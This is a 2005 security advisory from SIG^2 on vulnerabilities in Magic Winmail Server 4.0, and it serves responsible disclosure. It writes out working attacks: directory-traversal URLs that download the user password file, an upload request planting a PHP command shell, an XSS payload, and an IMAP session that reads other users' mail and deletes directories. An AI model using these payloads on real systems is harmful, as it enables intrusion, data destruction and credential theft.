Objectives About Us Sponsors News Past Events Contact Us
Login G-TEC CC Mirror Forums Links

 

 

SIG^2 Vulnerability Research Advisory

Magic Winmail Server v4.0 Multiple Vulnerabilities

by Tan Chew Keong
Release Date: 27 Jan 2005

Summary

Magic Winmail Server is an enterprise class mail server software system offering a robust feature set, including extensive security measures. Winmail Server supports SMTP, POP3, IMAP, Webmail, LDAP, multiple domains, SMTP authentication, spam protection, anti-virus protection, SSL/TLS security, Network Storage, remote access, Web-based administration, and a wide array of standard email options such as filtering, signatures, real-time monitoring, archiving, and public email folders.

Multiple vulnerabilies were found in Magic Winmail Server's Webmail service, IMAP service and FTP service. Winmail Server's PHP-based Webmail has vulnerabilities that may be exploited to download arbitrary files from the server, to upload files to arbitrary directories, and to conduct Cross-Site Scripting (XSS) attacks. Directory traversal vulnerability in Winmail Server's IMAP service gives the malicious user the ability to read arbitrary user's emails, create/delete arbitrary directories on the server, and/or to retrieve arbitrary files from the server. In addition, Winmail Server's FTP service does not validate the IP address supplied in a PORT command. This may be exploited to perform portscan from the FTP server.

 
Tested System

Magic Winmail Server Version 4.0 Build 1112 on English Win2K SP4 and WinXP SP2.

 
Details

Multiple vulnerabilities were found in Magic Winmail Server Version 4.0 (Build 1112)'s Webmail, IMAP and FTP services.

1. Webmail Vulnerabilities

Winmail Server has a Webmail interface that allows the user to read/send emails using his/her browser. This Webmail interface is implemented using PHP scripts and runs on the Apache/PHP server that is bundled together in the installation package. Default installation runs Apache/PHP as a Windows Service with LOCAL SYSTEM priviledge. Vulnerabilities in the PHP scripts allow arbitrary file download, file upload to arbitrary directories, and XSS.  

a. download.php directory traversal allows arbitrary file download

The download.php script allows a user to download his/her email file attachment. Lack of input parameter sanitization allows a logon mail user to retrieve arbitrary files from the server by supplying specially crafted input parameters to download.php. The following two requests will retrieve userauth.cfg, which contains users' MD5 password hashes.

Each of the two requests takes a different code path through download.php to download the file. 

http://[hostname]:6080/download.php?
	sid=656041e927559a2ff&		// this must be the current session id 
	tid=0&folder=INBOX&ix=0&part=1&optype=download&type=nonmime&filename=Ly4uLy4uLy4uLy4uL3VzZXJhdXRoLmNmZw==

// Note Ly4uLy4uLy4uLy4uL3VzZXJhdXRoLmNmZw== is the base64 encoding of /../../../../userauth.cfg

http://[hostname]:6080/download.php?
	sid=656041e927559a2ff&
	tid=0&folder=INBOX&ix=0&part=1&optype=download&cache=1&filename=/../../../../userauth.cfg
 

b. upload.php directory traversal allows file upload to arbitrary directories

The upload.php scripts allows a mail user to upload his/her email file attachment when composing an email. Lack of input sanitization of the supplied filename allows a logon mail user to upload files to arbitrary location on the server. This may be exploited to upload arbitrary PHP scripts into the webmail directory as shown below. Successful exploitation on the default installation of Winmail server will allow execution of arbitrary PHP scripts with LOCAL SYSTEM privilege. The full HTTP request can be viewed here.

-----------------------------31140333525651
Content-Disposition: form-data; name="userfile1"; filename="/../../../a.php"
Content-Type: application/download

<?php
system($_GET[cmd]);
?>
 

c. XSS vulnerability in Webmail Web Administration when displaying mail users' personal info.

The /admin/user.php script allows the Webmail administrator to view webmail users' username, fullname, description, and company name. A malicious user may input javascript in his own personal info using userinfo.php. Due to lack of filtering of HTML special characters, these javascript will execute on the Webmail administrator's browser when the administrator accesses the /admin/user.php script. These javascripts may be crafted to steal the administrator's session cookie, etc.

For example, the user may set his description to <script>alert(document.form1.sid.value);</script>
 

2. IMAP Service Directory Traversal Vulnerability

Directory traversal vulnerability was found in several of Winmail Server's IMAP commands. These vulnerable commands may be exploited by a malicious logon user to read arbitrary user's emails, create/delete arbitrary directories on the server, and/or to retrieve arbitrary files from the server. IMAP commands like CREATE, EXAMINE, SELECT and DELETE are affected by this vulnerability.

The following transcript of an IMAP session illustrates this.

[c:\]nc X.X.X.X 143
* OK IMAP4 ready! localhost Winmail Mail Server MagicWinmail Extend IMAP 101
1 LOGIN "test" "password"			// login as user test
1 OK LOGIN OK.
2 SELECT "../test2/INBOX"			// selected user test2's mailbox
* FLAGS (\Answered \Deleted \Draft \Seen \Recent)
* OK [PERMANENTFLAGS (\Answered \Draft \Flagged \Seen)]
* 1 EXISTS
* 0 RECENT
* OK [UNSEEN 1] Message 1 is unseen.
* OK [UIDNEXT 2] Predicted valid
* OK [UIDVALIDITY 1105791403] UIDs valid
2 OK [READ-WRITE] OK SELECT completed.
3 UID fetch 1:1 (UID RFC822.SIZE FLAGS BODY.PEEK[])	// retrieve test2's mail
* 1 FETCH (UID 1 FLAGS () RFC822.SIZE 271 BODY[] {422}
Return-Path: 
Delivered-To: test2@xxx.xx
Received: (winmail server invoked for smtp delivery); Sat, 15 Jan 2005 20:16:18
+0800
Received: (winmail server invoked for report); Sat, 15 Jan 2005 20:16:18 +0800
From: postmaster@xxx.xx
To: test2@xxx.xx
Date: Sat, 15 Jan 2005 20:16:18 +0800
Subject: welcome

Hi, test2
Welcome to use the mail system!
Your mail address is test2@xxx.xx.

.
 )
3 OK FETCH completed.
4 CREATE "../../../../../../../../hacked"		// create directory in root dir
4 OK "../../../../../../../../hacked" created.
5 DELETE "../../../../../../../../data"			// delete "data" directory in root dir
5 OK DELETE completed.
6 SELECT "../../../server"				// this will corrupt all filenames in \installdir\server!!
* FLAGS (\Answered \Deleted \Draft \Seen \Recent)
* OK [PERMANENTFLAGS (\Answered \Draft \Flagged \Seen)]
* 11 EXISTS
* 11 RECENT
* OK [UNSEEN 11] Message 11 is unseen.
* OK [UIDNEXT 23] Predicted valid
* OK [UIDVALIDITY 1105793353] UIDs valid
6 OK [READ-WRITE] OK SELECT completed.
7 UID fetch 21 (UID RFC822.SIZE FLAGS BODY.PEEK[])	// stealing userauth.cfg
* 10 FETCH (UID 21 FLAGS (\Recent ) RFC822.SIZE 3933 BODY[] {3933}
<database>

<user>
<item>
<name>postmaster</name>
<domain></domain>
<password>password</password>
<fullname>postmaster</fullname>
<description></description>

[snipped]
 

3. FTP Service PORT Command Vulnerability

Winmail Server's FTP service does not validate the IP address supplied in a PORT command. It is possible to issue the PORT command with an IP address that is different from the logon user's IP address. This may be exploited to perform portscan from the FTP server.
 

Patch

  1. Upgrade to version 4.0 (Build 1318).

 
Disclosure Timeline

15 Jan 05 - Vulnerability Discovered.
16 Jan 05 - Initial Vendor Notification by Email and Web Form.
16 Jan 05 - Initial Vendor Reply.
27 Jan 05 - Received Email from Vendor that a Fixed Version was Released.
27 Jan 05 - Public Release

 

Contacts

For further questions and enquries, email them to the following.

Overall-in-charge: Tan Chew Keong


Updated: 27/01/2005
webmaster@security.org.sg